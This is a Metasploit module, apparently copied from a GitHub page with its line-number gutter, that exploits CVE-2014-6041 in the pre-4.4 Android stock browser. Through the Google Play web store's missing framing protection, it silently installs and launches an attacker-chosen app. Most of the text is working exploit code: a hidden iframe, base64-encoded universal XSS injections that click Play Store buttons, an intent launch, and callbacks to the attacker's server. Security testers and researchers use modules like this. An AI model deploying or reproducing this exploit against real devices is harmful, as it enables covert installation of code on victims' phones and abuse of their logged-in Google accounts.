/
google_play_store_uxss_xframe_rce.rb
180 lines (159 loc) · 6.35 KB
/
google_play_store_uxss_xframe_rce.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Android Browser RCE Through Google Play Store XFO',
'Description' => %q{
This module combines two vulnerabilities to achieve remote code
execution on affected Android devices. First, the module exploits
CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in
versions of Android's open source stock browser (the AOSP Browser) prior to
4.4. Second, the Google Play store's web interface fails to enforce a
X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be
targeted for script injection. As a result, this leads to remote code execution
through Google Play's remote installation feature, as any application available
on the Google Play store can be installed and launched on the user's device.
This module requires that the user is logged into Google with a vulnerable browser.
To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`.
},
'Author' => [
'Rafay Baloch', # Original UXSS vulnerability
'joev' # Play Store vector and Metasploit module
],
'License' => MSF_LICENSE,
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'References' => [
[ 'URL', 'https://www.rapid7.com/blog/post/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041/'],
[ 'URL', 'https://web.archive.org/web/20150316151817/http://1337day.com/exploit/description/22581' ],
[ 'OSVDB', '110664' ],
[ 'CVE', '2014-6041' ]
],
'DefaultAction' => 'WebServer'
))
register_options([
OptString.new('PACKAGE_NAME', [
true,
'The package name of the app on the Google Play store you want to install',
'com.swlkr.rickrolld'
]),
OptString.new('ACTIVITY_NAME', [
true,
'The name of the activity in the apk to launch',
'com.swlkr.rickrolld/.RickRoll'
]),
OptBool.new('DETECT_LOGIN', [
true, "Prevents the exploit from running if the user is not logged into Google", true
]),
OptBool.new('HIDE_IFRAME', [
true, "Hide the exploit iframe from the user", true
])
])
end
def on_request_uri(cli, request)
print_status("Request '#{request.method} #{request.uri}'")
if request.method.downcase == 'post'
print_error request.body[0..400]
send_response_html(cli, '')
else
print_status("Sending initial HTML ...")
send_response_html(cli, exploit_html)
end
end
def exploit_html
<<-EOS
<html>
<body>
<script>
var APP_ID = '#{datastore['PACKAGE_NAME']}';
var MAIN_ACTIVITY = '#{datastore['ACTIVITY_NAME']}';
var HIDDEN_STYLE = '#{hidden_css}';
function exploit() {
var src = 'https://play.google.com/store/apps/'+(new Array(2000)).join('aaaaaaa');
var frame = document.createElement('iframe');
frame.setAttribute('src', src);
frame.setAttribute('name', 'f');
frame.setAttribute('style', HIDDEN_STYLE);
function uxss(src) {
window.open('\\u0000javascript:eval(atob("'+ btoa(src) +'"))', 'f');
}
var loaded = false;
frame.onload = function() {
if (loaded) return;
loaded = true;
setTimeout(function(){
uxss('history.replaceState({},{},"/"); x=new XMLHttpRequest;x.open("GET", "/store/apps/details?id='+APP_ID+'");x.onreadystatechange=function(){'+
'if(x.readyState==4){ document.open("text/html"); document.write(x.responseText); document.close(); top.postMessage("1", "*") }};x.send();');
}, 100);
};
var i1, i2;
var w = window;
window.onmessage = function(event) {
if (event.data === '1') {
i1 = w.setInterval(function(){
uxss('document.body.innerHTML.match(/This app is compatible/).length; document.querySelector("button.price").click(); top.postMessage("2", "*");');
}, 500);
} else if (event.data === '2') {
w.clearInterval(i1);
i2 = setInterval(function(){2
uxss('document.querySelector("button.play-button.apps.loonie-ok-button").click(); top.postMessage("3", "*");');
}, 500);
} else if (event.data === '3') {
clearInterval(i2);
setTimeout(function(){
setInterval(function(){
frame.src = 'intent:launch#Intent;SEL;component='+MAIN_ACTIVITY+';end';
}, 500);
}, 1000);
}
}
document.body.appendChild(frame);
}
#{detect_login_js}
</script>
</body>
</html>
EOS
end
def detect_login_js
if datastore['DETECT_LOGIN']
%Q|
var img = document.createElement('img');
img.onload = exploit;
img.onerror = function() {
var url = '#{backend_url}';
var x = new XMLHttpRequest();
x.open('POST', url);
x.send('Exploit failed: user is not logged into google.com')
};
img.setAttribute('style', HIDDEN_STYLE);
var rand = '&d=#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';
img.setAttribute('src', 'https://accounts.google.com/CheckCookie?continue=https%3A%2F%2Fwww.google.com%2Fintl%2Fen%2Fimages%2Flogos%2Faccounts_logo.png'+rand);
document.body.appendChild(img);
|
else
'exploit();'
end
end
def hidden_css
if datastore['HIDE_IFRAME']
'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px;visibility:hidden;'
else
''
end
end
def backend_url
proto = (datastore["SSL"] ? "https" : "http")
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
"#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
end
def run
exploit
end
end